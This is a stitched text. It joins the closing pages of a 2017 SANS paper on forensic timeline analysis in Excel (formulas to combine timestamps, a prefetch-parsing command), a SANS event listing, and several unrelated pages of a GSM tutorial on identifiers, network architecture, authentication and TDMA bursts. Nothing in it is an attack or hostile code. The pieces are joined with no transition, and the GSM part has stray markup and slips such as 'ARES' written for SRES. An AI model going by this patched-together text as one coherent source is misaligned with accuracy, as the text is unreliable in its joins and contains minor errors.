© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 6
8 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	 
Figure	 89.	Combining	Date/Time	columns.	(Lee,	2014,	digital	case	files) 	
To combine the columns of timestamps and to display those timestamps in the 
correct format, a function will be used that specifically tells Excel how the values should 
look. The first function will combine the ‘Std Info’ timestamps (Figure 90). 
="Std Info - Create: " & TEXT(D2, "mm/dd/yyyy hh:mm:ss") & ", Modify: " & 
TEXT(E2, "mm/dd/yyyy hh:mm:ss") & ", Entry: " & TEXT(F2, "mm/dd/yyyy hh:mm:ss")  
 
Figure	 90.	A	function	to	combine	columns .	(Lee,	2014,	digital	case	files) 	
The second function performs the same action, just on the ‘FN Info’ timestamps : 

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 6
9 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	="FN  Info - Modify: " & TEXT(G2, "mm/dd/yyyy hh:mm:ss") & ", Entry: " & 
TEXT(H2, "mm/dd/yyyy hh:mm:ss")  
When dealing with a large set of data and filling a column with a function, you 
may run into an issue where the values in the cells do not match the formula  applied to 
that cell (Figure 91 – Number 1). To fix this issue, on the ‘Formula’ ribbon, select the 
‘Calculate Now’ button to refresh/recalculate the function formulas (Figure 91 – Number 
2).  
 
Figure	 91.	Recalculate	function	val ues.	(Lee,	2014,	digital	case	files) 	
The recalculated combined columns should look like Figure 92. 

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 7
0 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	 
Figure	 92.	Date/Time	column	results.	(Lee,	2014,	digital	case	files) 	
A few final changes need to be made such as entering in the standard headers; 
creating and filli ng in the Artifacts column; moving the old ‘ Record Number ’ column to 
the ‘Miscellaneous’ column ; and adding a prefix to the ‘Miscellaneous’ column  for 
clarity (Figure 93). 
 
Figure	 93.	Moving	‘ Record	Number’ 	column	and	adding	 a	prefix	to	columns.	(Lee,	2014,	digital	case	files) 	
The final output should look like Figure 94. 

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 7
1 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	 
Figure	 94.	Final	output.	(Lee,	2014,	digital	case	files) 	
8.4.7.  Prefetch Entries  
We produced the Prefetch  output used in this example by running the 
parse_prefetch_info tool against the prefetch directory of a Windows 7 system:  
parse_prefetch_info.exe –p <Path to Prefetch Directory> -d <database_name> -
w Vista -o <Path to Output Directory> -r csv  
One of the f iles generated  when  running the above command is 
prefetch_file_info.csv which contains a nice summary of the prefetch file activities on the 
system. When you open the file and apply the standard formatting, you’ll notice that the 
‘UTC time’ column is not f ormatted properly  (Figure 95). 

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 7
2 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	 
Figure	 95.	Fix	date	and	times	to	 match	our	 standard	format.	(Lee,	2014,	digital	case	files) 	
Unfortunately, Excel does not recognize these values as Dates or Times, so we’ll 
need to fix it so that it  does. All the information is there, but the order in which it appears 
is not quite right. To correct this, we will reorder the data. First , we highlight the ‘UTC 
time’ column and then click the ‘Text to Columns’ button on the ‘Data’ ribbon to 
separate the  items using a ‘Space’ character as the delimiter (Figure 96).  
 
Figure	 96.	Text	to	columns	to	fix	 Date/Time .	(Lee,	2014,	digital	case	files) 	
Once each Date/Time item is in its own column, the following  formula can be 
used to add them back together in the proper order (Figure 97): 
=DATE(H2,MONTH(1&E2),F2) + G2  

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 7
3 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	 
Figure	 97.	Reorder	date	and	time	fields.	(Lee,	2014,	digital	case	files) 	
After copying  the cell values over the  functio ns in the new column , you can delete  
the delimited columns  you just created . Next, m ove the new Date/Time c olumn to the 
beginning of the spreadsheet, insert columns where needed and modify the column 
headers to match our standard headers. Finally , prepend ‘Number Time Runs’ to the new 
‘Properties’ column entries and manually enter the Artifact and Computer column values 
for a final result (Figure 98).  
 
Figure	 98.	Prefetch	 results .	(Lee,	2014,	digital	case	files) 	

Last Updated: May 7th, 2017
Upcoming SANS Training
Click Here for a full list of all Upcoming SANS Events by Location
SANS Zurich 2017 Zurich, CH May 15, 2017 - May 20, 2017 Live Event
SANS Northern Virginia - Reston 2017 Reston, V AUS May 21, 2017 - May 26, 2017 Live Event
SANS Melbourne 2017 Melbourne, AU May 22, 2017 - May 27, 2017 Live Event
SEC545: Cloud Security Architecture and Ops Atlanta, GAUS May 22, 2017 - May 26, 2017 Live Event
SANS London May 2017 London, GB May 22, 2017 - May 27, 2017 Live Event
SANS Madrid 2017 Madrid, ES May 29, 2017 - Jun 03, 2017 Live Event
SANS Stockholm 2017 Stockholm, SE May 29, 2017 - Jun 03, 2017 Live Event
SANS Atlanta 2017 Atlanta, GAUS May 30, 2017 - Jun 04, 2017 Live Event
SANS Houston 2017 Houston, TXUS Jun 05, 2017 - Jun 10, 2017 Live Event
Security Operations Center Summit & Training Washington, DCUS Jun 05, 2017 - Jun 12, 2017 Live Event
SANS San Francisco Summer 2017 San Francisco, CAUS Jun 05, 2017 - Jun 10, 2017 Live Event
SANS Charlotte 2017 Charlotte, NCUS Jun 12, 2017 - Jun 17, 2017 Live Event
SANS Thailand 2017 Bangkok, TH Jun 12, 2017 - Jun 30, 2017 Live Event
SANS Secure Europe 2017 Amsterdam, NL Jun 12, 2017 - Jun 20, 2017 Live Event
SANS Milan 2017 Milan, IT Jun 12, 2017 - Jun 17, 2017 Live Event
SEC555: SIEM-Tactical Analytics San Diego, CAUS Jun 12, 2017 - Jun 17, 2017 Live Event
SANS Rocky Mountain 2017 Denver, COUS Jun 12, 2017 - Jun 17, 2017 Live Event
SANS Minneapolis 2017 Minneapolis, MNUS Jun 19, 2017 - Jun 24, 2017 Live Event
SANS Philippines 2017 Manila, PH Jun 19, 2017 - Jun 24, 2017 Live Event
DFIR Summit & Training 2017 Austin, TXUS Jun 22, 2017 - Jun 29, 2017 Live Event
SANS Paris 2017 Paris, FR Jun 26, 2017 - Jul 01, 2017 Live Event
SANS Columbia, MD 2017 Columbia, MDUS Jun 26, 2017 - Jul 01, 2017 Live Event
SANS Cyber Defence Canberra 2017 Canberra, AU Jun 26, 2017 - Jul 08, 2017 Live Event
SEC564:Red Team Ops San Diego, CAUS Jun 29, 2017 - Jun 30, 2017 Live Event
SANS London July 2017 London, GB Jul 03, 2017 - Jul 08, 2017 Live Event
Cyber Defence Japan 2017 Tokyo, JP Jul 05, 2017 - Jul 15, 2017 Live Event
SANS Los Angeles - Long Beach 2017 Long Beach, CAUS Jul 10, 2017 - Jul 15, 2017 Live Event
SANS ICS & Energy-Houston 2017 Houston, TXUS Jul 10, 2017 - Jul 15, 2017 Live Event
SANS Munich Summer 2017 Munich, DE Jul 10, 2017 - Jul 15, 2017 Live Event
SANS Cyber Defence Singapore 2017 Singapore, SG Jul 10, 2017 - Jul 15, 2017 Live Event
SANSFIRE 2017 Washington, DCUS Jul 22, 2017 - Jul 29, 2017 Live Event
Security Awareness Summit  & Training 2017 Nashville, TNUS Jul 31, 2017 - Aug 09, 2017 Live Event
SANS Security West 2017 OnlineCAUS May 09, 2017 - May 18, 2017 Live Event
SANS OnDemand Books & MP3s OnlyUS Anytime Self PacedIntroduction to GSM
Uplink/Downlink     FDMA     Frequencies     Number Identifiers     MSISDN     IMSI     IMEI     IMEISV 
    
Home 
Introduction
GSM is an acronym that stands for Global System for Mobile Communications . The 
original french acronym stands for Groupe Spécial Mobile . It was originally developed in  
1984 as a standard for a mobile telephone system that could be used across Europe.
GSM is now an international standard for mobile service. It offers high mobility.  
Subscribers can easily roam worldwide and access any GSM network. 
GSM is a digital cellular network. At the time the standard was developed it offered  
much higher capacity than the current analog systems. It also allowed for a more optimal  
allocation of the radio spectrum, which therefore allows for a larger number of  
subscribers.
GSM offers a number of services including voice communications, Short Message  
Service (SMS), fax, voice mail, and other supplemental services such as call forwarding  
and caller ID.
Currently there are several bands in use in GSM. 450 MHz, 850 MHZ, 900 MHz, 1800  
MHz, and 1900 MHz are the most common ones.
Some bands also have Extended GSM (EGSM)  bands added to them, increasing the  
amount of spectrum available for each band.
GSM makes use of Frequency Division Multiple Access (FDMA) and Time Division  
Multiple Access (TDMA).
*TDMA will be discussed later
[Back to Top] 
Uplinks/Downlinks & Reverse Forward
GSM allows for use of duplex operation. Each band has a frequency range for the uplink  
(cell phone to tower) and a separate range for the downlink (tower to the cell phone). The  
uplink is also known as the Reverse and the downlink is also known as the Forward. In 
this tutorial, I will use the terms uplink and downlink.
Uplink and Downlink
[Back to Top] 
Frequency Division Multiple Access (FDMA)
GSM divides the allocated spectrum for each band up into idividual carrier frequencies.  
Carrier separation is 200 khz. This is the FDMA aspect of GSM. 
Absolute Radio Frequency Channel Number (ARFCN)
The ARFCN is a number that describes a pair of frequencies, one uplink and one  
downlink. The uplink and downlink frequencies each have a bandwidth of 200 kHz. The  
uplink and downlink have a specific offset that varies for each band. The offset is the  
frequency separation of the uplink from the downlink. Every time the ARFCN increases,  
the uplink will increase by 200 khz and the downlink also increases by 200 khz.
*Note: Although GSM operates in duplex (separate frequencies for transmit and receive), the mobile  
station does not transmit and receive at the same time. A switch is used to toggle the antenna between the  
transmitter and receiver.  
The following table summarizes the frequency ranges, offsets, and ARFCNs for several  
popular bands.
GSM Bands
The following diagram illustrates an ARFCN with paired uplink and downlink  
frequencies for ARFCN 1 in the GSM 900 band.
GSM900 ARFCN 1
[Back to Top] 
Calculating Uplink/Downlink Frequencies
The following is a way to calculate the uplink and downlink frequencies for some of the  
bands, given the band, the ARFCN, and the offset.
GSM 900
Up = 890.0 + (ARFCN * .2) 
Down = Up + 45.0
example: 
      Given the ARFCN 72, and we know the offset is 45MHz for the GSM900 band:
     Up = 890.0 + (72 * .2)
     Up = 890.0 + (14.4)
     Up = 904.40 MHz
     Down = Up + Offset
     Down = 904.40 + 45.0
     Down = 949.40 MHz
The uplink/downlink pair for GSM900 ARFCN72 is 904.40/949.40 (MHz) 
Here are the formulas for EGSM900, DCS1800, and PCS1900: 
EGSM900
Up = 890.0 + (ARFCN * .2) 
Down = Up + 45.0 
DCS1800
Up = 1710.0 + ((ARFCN - 511) * .2) 
Down = Up + 95.0 
PCS1900
Up = 1850.0 + ((ARFCN - 512) * .2) 
Down = Up + 80.0
[Back to Top] 
Numbering System (Identifiers)
Mobile Subscriber ISDN (MSISDN)
     The MSISDN is the subscriber's phone number. It is the number that another person  
would dial in order to reach the subscriber. The MSISDN is composed of three parts:
     Country Code (CC)
     National Destination Code (NDC)
     Subscriber Number (SN)
MSISDN
Country Code (CC)  - This is the international dialing code for whichever country the  
MS is registered to.
National Destination Code (NDC)  - In GSM, an NDC is assigned to each PLMN. In  
many cases, a PLMN may need more than one NDC.
Subscriber Number (SN)  - This is a number assigned to the subscriber by the service  
provider (PLMN).
The combination of the NDC and the SN is known as the National (significant) Mobile  
Number. This number identifies a subscriber within the GSM PLMN.
National (significant) Mobile Number
[Back to Top] 
International Mobile Subscriber Identity (IMSI)
     The IMSI is how the subscriber is identified to the network. It uniquely identifies the  
subscriber within the GSM global network. The IMSI is burned into the SIM card when  
the subscriber registers with PLMN service provider. The IMSI is composed of three  
parts:
     Mobile Country Code (MCC)
     Mobile Network Code (MNC)
     Mobile Subscriber Identification Number (MSIN)
IMSI
Mobile Country Code (MCC)  - This number identifies which country the subscriber's  
network is in. It has 3 digits.
Mobile Network Code (MNC)  - This number identifies the home GSM PLMN of the  
subscriber (Cingular, T-Mobile, etc.). It has 2 or 3 digits. Some networks may have more  
than one MNC allocated to it.
Mobile Subscriber Identification Number (MSIN)  - This number uniquely identifies a  
user within the home GSM network.
[Back to Top] 
International Mobile Equipment Identity (IMEI)
     The IMEI uniquely identifies the Mobile Equipment itself. It is essentially a serial  
number that is burned into the phone by the manufacturer. The IMEI is composed of  
three parts:
     Type Allocation Code (TAC) - 8 digits
     Serial Number (SNR) - 6 digits
     Spare (SP) - 1 digit
IMEI
Type Allocation Code (TAC)  - This number uniquely identifies the model of a wireless  
device. It is composed of 8 digits. Under the new system (as of April 2004), the first two  
digits of a TAC are the Reporting Body Identifier  of the GSMA approved group that  
allocated this model type.
Serial Number (SNR)  - This number is a manufacturer defined serial number for the  
model of wireless device.
Spare (SP) This number is a check digit known as a Luhn Check Digit. It is omitted 
during transmission within the GSM network.
On many devices the IMEI number can be retrieved by entering *#06#
Former IMEI Structure
Prior to April, 2004 the IMEI had a different structure:
     Type Allocation Code (TAC) - 6 digits
     Factory Assembly Code (FAC) - 2 digits
     Serial Number (SNR) - 6 digits
     Spare (SP) - 1 digit
Former IMEI Structure
As of April 2004, the use of the FAC was no longer required. The current practice is for  
the TAC for a new model to get approved by national regulating bodies, known as the  
Reporting Body Identifier .
[Back to Top] 
International Mobile Equipment Identity/Software  
Version (IMEISV)
     This is a newer form of the IMEI that omits the Spare digit at the end and adds a 2-
digit Software Version Number (SVN)  at the end. The SVN identifies the software version  
that the wireless device is using. This results in a 16-digit IMEI.
     Type Allocation Code (TAC) - 8 digits
     Serial Number (SNR) - 6 digits
     Software Version Number (SVN) - 2 digits
IMEISV
Uplink/Downlink     FDMA     Frequencies     Number Identifiers     MSISDN     IMSI     IMEI     IMEISV 
    
Introduction     Architecture     TDMA     Logical Channels     Authentication & Encryption      Timing 
Advances     Speech Encoding     GSM Events 
Updates     Bulletin Board     Sitemap     Contact Me 
Home 
Network Architecture
Mobile Station     Base Transceiver Station      Base Station Controller      Mobile Switching Center      
Gateway MSC     
Home Location Register      Visitor Location Register      Equipment Identity Register      Authentication 
Center     
Home 
GSM Network Architecture
A GSM network is made up of multiple components and interfaces that facilitate sending  
and receiving of signalling and traffic messages. It is a collection of transceivers,  
controllers, switches, routers, and registers.
A Public Land Mobile Network (PLMN) is a network that is owned and operated by one  
GSM service provider or administration, which includes all of the components and  
equipment as described below. For example, all of the equipment and network resources  
that is owned and operated by Cingular is considered a PLMN.
Mobile Station (MS)
The Mobile Station (MS) is made up of two components:
Mobile Equipment (ME)  This refers to the physical phone itself. The phone must be  
able to operate on a GSM network. Older phones operated on a single band only. Newer  
phones are dual-band, triple-band, and even quad-band capable. A quad-band phone has  
the technical capability to operate on any GSM network worldwide. 
Each phone is uniquely identified by the International Mobile Equipment Identity  (IMEI) 
number. This number is burned into the phone by the manufacturer. The IMEI can  
usually be found by removing the battery of the phone and reading the panel in the  
battery well.
It is possible to change the IMEI on a phone to reflect a different IMEI. This is known as  
IMEI spoofing or IMEI cloning. This is usually done on stolen phones. The average user  
does not have the technical ability to change a phone's IMEI.
Subscriber Identity Module (SIM)  - The SIM is a small smart card that is inserted into  
the phone and carries information specific to the subscriber, such as IMSI, TMSI, Ki (used 
for encryption), Service Provider Name (SPN), and Local Area Identity  (LAI). The SIM 
can also store phone numbers (MSISDN) dialed and received, the Kc (used for 
encryption), phone books, and data for other applications. A SIM card can be removed  
from one phone, inserted into another GSM capable phone and the subscriber will get the  
same service as always.
Eadch SIM card is protected by a 4-digit Personal Identification Number (PIN). In order  
to unlock a card, the user must enter the PIN. If a PIN is entered incorrectly three times in  
a row, the card blocks itself and can not be used. It can only be unblocked with an 8-digit  
Personal Unblocking Key (PUK), which is also stored on the SIM card. 
[Back to Top] 
Base Transceiver Station (BTS)
Base Transceiver Station (BTS)  - The BTS is the Mobile Station's access point to the  
network. It is responsible for carrying out radio communications between the network  
and the MS. It handles speech encoding, encryption, multiplexing ( TDMA), and 
modulation/demodulation of the radio signals. It is also capable of frequency hopping. A  
BTS will have between 1 and 16 Transceivers (TRX), depending on the geography and  
user demand of an area. Each TRX represents one ARFCN.
One BTS usually covers a single 120 degree sector of an area. Usually a tower with 3  
BTSs will accomodate all 360 degrees around the tower. However, depending on  
geography and user demand of an area, a cell may be divided up into one or two sectors,  
or a cell may be serviced by several BTSs with redundant sector coverage.
A BTS is assigned a Cell Identity. The cell identity is 16-bit number (double octet) that  
identifies that cell in a particular Location Area. The cell identity is part of the Cell  
Global Identification (CGI), which is discussed in the section about the Visitor Location  
Register (VLR).
120 ° Sector
The interface between the MS and the BTS is known as the Um Interface or the Air 
Interface.
Um Interface
[Back to Top] 
Base Station Controller (BSC)
Base Station Controller (BSC)  - The BSC controls multiple BTSs. It handles allocation  
of radio channels, frequency administration, power and signal measurements from the  
MS, and handovers from one BTS to another (if both BTSs are controlled by the same  
BSC). A BSC also functions as a "funneler". It reduces the number of connections to the  
Mobile Switching Center  (MSC) and allows for higher capacity connections to the MSC.
A BSC my be collocated with a BTS or it may be geographically separate. It may even be  
collocated with the Mobile Switching Center (MSC). 
Base Station Controller
The interface between the BTS and the BSC is known as the Abis 
Interface
Abis Interface
The Base Transceiver Station (BTS) and the Base Station Controller  
(BSC) together make up the Base Station System  (BSS). 
Base Station System
[Back to Top] 
Mobile Switching Center (MSC)
Mobile Switching Center (MSC)  - The MSC is the heart of the GSM netowrk. It  
handles call routing, call setup, and basic switching functions. An MSC handles multiple  
BSCs and also interfaces with other MSC's and registers. It also handles iner-BSC  
handoffs as well as coordinates with other MSC's for inter-MSC handoffs.
Mobile Switching Center
The interface between the BSC and the MSC is known as the A Interface 

A Interface
[Back to Top] 
Gateway Mobile Switching Center (GMSC)
There is another important type of MSC, called a Gateway Mobile Switching Center  
(GMSC). The GMSC functions as a gateway between two networks. If a mobile  
subscriber wants to place a call to a regular landline, then the call would have to go  
through a GMSC in order to switch to the Public Switched Telephone Network (PSTN).
Gateway Mobile Switching Center
For example, if a subscriber on the Cingular network wants to call a subscriber on a T-
Mobile network, the call would have to go through a GMSC.
Connections Between Two Networks
The interface between two Mobile Switching Centers (MSC) is called the E Interface

E Interface
[Back to Top] 
Home Location Register (HLR)
Home Location Register (HLR)  - The HLR is a large database that permanently stores  
data about subscribers. The HLR maintains subscriber-specific information such as the  
MSISDN, IMSI, current location of the MS, roaming restrictions, and subscriber  
supplemental feautures. There is logically only one HLR in any given network, but  
generally speaking each network has multiple physical HLRs spread out across its  
network.
[Back to Top] 
Visitor Location Register (VLR)
Visitor Location Register (VLR)  - The VLR is a database that contains a subset of the  
information located on the HLR. It contains similar information as the HLR, but only for  
subscribers currently in its Location Area. There is a VLR for every Location Area. The  
VLR reduces the overall number of queries to the HLR and thus reduces network traffic.  
VLRs are often identified by the Location Area Code (LAC) for the area they service. 
Visitor Location Register
Location Area Code (LAC)
A LAC is a fixed-length code (two octets) that identifies a location area within the  
network. Each Location Area is serviced by a VLR, so we can think of a Location Area  
Code (LAC) being assigned to a VLR.
Location Area Identity (LAI)
An LAI is a globally uniqe number that identifies the country, network provider, and  
LAC of any given Location Area, which coincides with a VLR. It is composed of the  
Mobile Country Code (MCC), the Mobile Network Code (MNC), and the Location Area  
Code (LAC). The MCC and the MNC are the same numbers used when forming the  
IMSI.
Location Area Identity (LAI)
Cell Global Identification (CGI)
The CGI is a number that uniquely identifies a specific cell within its location area,  
network, and country. The CGI is composed of the MCC, MNC, LAI, and Cell Identity  
(CI)
Cell Global Identity
The VLR also has one other very important function: the assignment of a Temporary  
Mobile Subscriber Identity (TMSI). TMSIs are assigned by the VLR to a MS as it comes  
into its Location Area. TMSIs are unique to a VLR. TMSIs are only allocated when in  
cipher mode.
The interface between the MSC and the VLR is known as the B Interface and the 
interface between the VLR and the HLR is known as the D Interface. The interface 
between two VLRs is called the G Interface
B and D Interfaces
[Back to Top] 
Equipment Identity Register (EIR)
Equipment Identity Register (EIR)  - The EIR is a database that keeps tracks of  
handsets on the network using the IMEI. There is only one EIR per network. It is  
composed of three lists. The white list, the gray list, and the black list. 
The black list is a list if IMEIs that are to be denied service by the network for some  
reason. Reasons include the IMEI being listed as stolen or clonedor if the handset is  
malfunctioning or doesnt have the technical capabilities to operate on the network.
The gray list is a list of IMEIs that are to be monitored for suspicous activity. This could  
include handsets that are behaving oddly or not performing as the network expects it to.
The white list is an unpopulated list. That means if an IMEI is not on the black list or on  
the gray list, then it is considered good and is "on the white list".
The interface between the MSC and the EIR is called the F Interface.
Equipment Identity Register
[Back to Top] 
Authentication Center (Auc)
Authentication Center (AuC)  - The AuC handles the authentication and encryption  
tasks for the network. The Auc stores the Ki for each IMSI on the network. It also  
generates cryptovariables such as the RAND, SRES, and Kc. Although it is not required,  
the Auc is normally physically collocated with the HLR.
Authentication Center
There is one last interface that we haven't discussed. The interface between the HLR and  
a GMSC is called the C Interface. You will see it in the full network diagram below.This  
completes the introduction to the network architecture of a GSM network. Below you  
will find a network diagram with all of the components as well as the names of all of the  
interfaces.
Full GSM Network
Mobile Station     Base Transceiver Station      Base Station Controller      Mobile Switching Center      
Gateway MSC     
Home Location Register      Visitor Location Register      Equipment Identity Register      Authentication 
Center     
Introduction     Architecture     TDMA     Logical Channels     Authentication & Encryption      Timing 
Advances     Speech Encoding     GSM Events 
Updates     Bulletin Board     Sitemap     Contact Me 
Home 
Authentication & Encryption
Introduction     Authentication Procedures      Ciphering Procedures     
Home 
Introduction
Authentication - Whenever a MS requests access to a network, the network must  
authenticate the MS. Authentication verifies the identity and validity of the SIM card to  
the network and ensures that the subscriber is authorized access to the network. 
Encryption - In GSM, encryption refers to the process of creating authentication and  
ciphering cryptovariables using a special key and an encryption algorithm.
Ciphering - Ciphering refers to the process of changing plaintext data into encrypted  
data using a special key and a special encryption algorithm. Transmissions between the  
MS and the BTS on the Um link, are enciphered.
Ki - The Ki is the individual subscriber authentication key. It is a 128-bit number that is  
paired with an IMSI when the SIM card is created. The Ki is only stored on the SIM card  
and at the Authentication Center (AuC). The Ki should never be transmitted across the  
network on any link.
RAND - The RAND is a random 128-bit number that is generated by the Auc when the  
network requests to authenticate a subscriber. The RAND is used to generate the Signed  
Response (SRES) and Kc cryptovariables.
Signed Response - The SRES is a 32-bit cryptovariable used in the authentication  
process. The MS is challenged by being given the RAND by the network, the SRES is the  
expected correct response. The SRES is never passed on the Um (Air) interface. It is kept  
at the MSC/VLR, which performs the authentication check.
A3 Algorithm - The A3 algorithm computes a 32-bit Signed Response (SRES). The Ki  
and RAND are inputted into the A3 algorithm and the result is the 32-bit SRES. The A3  
algorithm resides on the SIM card and at the AuC.
A8 Algorithm - The A8 algorithm computes a 64-bit ciphering key (Kc). The Ki and the  
RAND are inputted into the A8 algorithm and the result is the 64-bit Kc. The A8  
algorithm resides on the ISM card and at the AuC.
Kc - The Kc is the 64-bit ciphering key that is used in the A5 encryption algorithm to  
encipher and decipher the data that is being transmitted on the Um interface.
A5 - The A5 encryption algorithm is used to encipher and decipher the data that is being  
transmitted on the Um interface. The Kc and the plaintext data are inputted into the A5  
algorithm and the output is enciphered data. The A5 algorithm is a function of the Mobile  
Equipment (ME) and not a function of the SIM card. The BTS also makes use of the A5  
algorithm.
There are three versions of the A5 algorithm:
     A5/1 - The current standard for U.S. and European networks. A5/1 is a stream  
cipher.<BR
     A5/2 - The deliberately weakened version of A5/1 that is intended for export to non-
western countries. A5/2 is a stream cipher.
     A5/3 - A newly developed algorithm not yet in full use. A5/3 is a block cipher.
Triplets - The RAND, SRES, and Kc together are known as the Triplets. The AuC will  
send these three cryptovariables to the requesting MSC/VLR so it can authenticate and  
encipher. 
[Back to Top] 
Authentication Procedures
when a MS requests  
access to the network,  
the MSC/VLR will  
normally require the MS  
to authenticate. The 
MSC will forward the  
IMSI to the HLR and  
request authentication  
Triplets. 

When the HLR receives  
the IMSI and the 
authentication request, it  
first checks its database  
to make sure the IMSI is  
valid and belongs to the  
network. Once it has  
accomplished this, it  
will forward the IMSI  
and authentication 
request to the 
Authentication Center  
(AuC). 
The AuC will use the  
IMSI to look up the Ki  
associated with that  
IMSI. The Ki is the  
individual subscriber  
authentication key. It is  
a 128-bit number that is  
paired with an IMSI  
when the SIM card is  
created. The Ki is only  
stored on the SIM card  
and at the AuC. The  
Auc will also generate a  
128-bit random number  
called the RAND. 

The RAND and the Ki  
are inputted into the A3  
encryption algorithm.  
The output is the 32-bit  
Signed Response 
(SRES). The SRES is  
essentially the 
"challenge" sent to the  
MS when authentication  
is requested. 
The RAND and Ki are  
input into the A8 
encryption algorithm.  
The output is the 64-bit  
Kc. The Kc is the 
ciphering key that is  
used in the A5 
encryption algorithm to  
encipher and decipher  
the data that is being  
transmitted on the Um  
interface. 

The RAND, SRES, and  
Kc are collectively  
known as the Triplets. 
The AuC may generate  
many sets of Triplets  
and send them to the  
requesting MSC/VLR.  
This is in order to 
reduce the signalling  
overhead that would  
result if the MSC/VLR  
requested one set of  
triplets every time it  
wanted to authenticate  
the. It should be noted  
that a set of triplets is  
unique to one IMSI, it  
can not be used with  
any other IMSI. 

Once the AuC has 
generated the triplets (or  
sets of triplets), it 
forwards them to the  
HLR. The HLr 
subsequently sends  
them to the requesting  
MSC/VLR. 
The MSC stores the Kc  
and the SRES but 
forwards the RAND to  
the MS and orders it to  
authenticate. 

The MS has the Ki  
stored on the SIM card.  
The A3 and A8 
algorithms also reside  
on the SIM card. The  
RAND and Ki are 
inputted into the A3 and  
A8 encryption 
algorithms to generate  
the SRES and the Kc  
respectively. 
[Back to Top] 
Ciphering Procedure
The MS stores the Kc  
on the SIM card and  
sends the generated  
SRES back to the 
network. The MSC  
recieves the MS 
generated SRES and  
compares it to the 
ARES generated by the  
AuC. if they match, then  
the MS is authenticated. 

Once the MS is 
authenticated, it passes  
the Kc to the BSS (the  
BTS to be specific), and  
orders the BTS and MS  
to switch to Cipher 
Mode. The Kc should 
not be passed on the Um  
link, it will be stored at  
the BTS. 
The BTS inputs the Kc  
and the data payload  
into the A5 encryption  
algorithm resulting in an  
enciphered data stream.  
The MS also inputs the  
Kc and the data payload  
into the A5 encryption  
algorithm resulting in an  
enciphered data stream.  
It should be noted that  
the A5 algorithm is a  
function of the Mobile  
Equipment (ME) and  
not the SIM card.
Introduction     Authentication Procedures      Ciphering Procedures     
Introduction     Architecture     TDMA     Logical Channels     Authentication & Encryption      Timing 
Advances     Speech Encoding     GSM Events 
Updates     Bulletin Board     Sitemap     Contact Me 
Home 
Time Division Multiple Access (TDMA)
Introduction     Time Slots     Data Rates     Burst Structure     Normal Burst     Frequency Correction Burst  
    Synchronization Burst 
Access Burst     Data Throughput     Frame Structure     TDMA Frame     Multiframes     Superframes     
Hyperframes     
Home 
Time Division Multiple Access
Introduction
GSM uses Time Division Multiple Acces (TDMA) as its access scheme. This is how the  
MS interfaces with the network. TDMA is the protocol used on the Air (Um) Link. GSM  
uses Gaussian Minimum-Shift Keying (GMSK) as its modulation methos.
Time Division means that the frequency is divided up into blocks of time and only certain  
logical channels are transmitted at certain times. Logical channels will be introduced in  
the next lesson.The time divisions in TDMA are known as Time Slots. 
Time Slots
A frequency is divided up into 8 time slots, numbered 0 to 7.
Time Slots
On a side note, also remember that GSM carrier frequencies are separated by 200kHz and  
that GSM operates in duplex. A channel number assigned to a pair of frequencies, one  
uplink and one downlink, is known as an Absolute Radio Frequency Channel Number  
(ARFCN). For a review of the ARFCN go to the Introduction to GSM Tutorial .
Each time slot lasts 576.9 μs. A time slot is the basic radio resource used to facilitate  
communication between the MS and the BTS.
Time Slot Duration
[Back to Top] 
Data Rates
As stated earlier, GSM uses Gaussian Minimum-Shift Keying (GMSK) as its modulation  
method. GMSK provides a modulation rate of 270.833 kilobits per second (kb/s).
At that rate, a maximum of 156.25 bits can be transmitted in each time slot (576.9 μs).
Math:
     270.833 kb/s × 1000 = 270,833 bits/sec    (Converting from kilobits to bits)
     270,833 b/sec ÷ 1,000,000 = .207833 b/μs    (Calculating bits per miscrosecond) 
     .207833 b/μs × 576.9 μs = 156.25 bits    (Calculating number of bits per time slot)
     So, 156.25 bits can be transmitted in a single time slot
Bits per Time Slot
[Back to Top] 
Data Burst
The data transmitted during a single time slot is known as a burst. Each burst allows 8.25  
bits for guard time within a time slot. This is to prevent bursts from overlapping and  
interfering with transmissions in other time slots. Subtracting this from the 156.25 bits,  
there are 148 bits usable for each burst.
There are four main types of bursts in TDMA:
Normal Burst (NB)
Frequency Correction Burst (FB)
Synchronization Burst (SB)
Access Burst (AB)
Normal Burst
The data transmitted during a single time slot is known as a burst. Each burst allows 8.25  
bits for guard time. This is to prevent bursts from overlapping and interfering with  
transmissions in other time slots.
Out of 156.25, this leaves 148 bits usable for each burst.
Here is the structure of a normal burst:
Burst
     Tail Bits - Each burst leaves 3 bits on each end in which no data is transmitted. This is  
designed to compensate for the time it takes for the power to rise up to its peak during a  
transmission. The bits at the end compensate for the powering down at the end of the  
transmission.
     Data Bits - There are two data payloads of 57 bits each.
     Stealing Flags - Indicates whether the burst is being used for voice/data (set to "0") or  
if the burst is being "stolen" by the FACCH to be used for singalling (set to "1").  *The 
FACCH is discussed in the Logical Channels Tutorial 
     Training Sequence  - The training sequence bits are used to overcome multi-path  
fading and propagation effects through a method called equalization.
*Note: 3GPP TS 45.001 Standard does not describe stealing bits, and instead allows for two 58-bit data  
payloads in a burst. However, it is common practice in GSM networks to use 57-bit payloads and stealing  
bits.
This diagram illustrates a single burst inside a time slot. Remember that 8.25 bits are not  
used in order to allow for a guard time. 
Burst within a Time Slot
Since each burst has two 57-bit data segments, we can see that a single burst has a data  
payload of 114 bits.
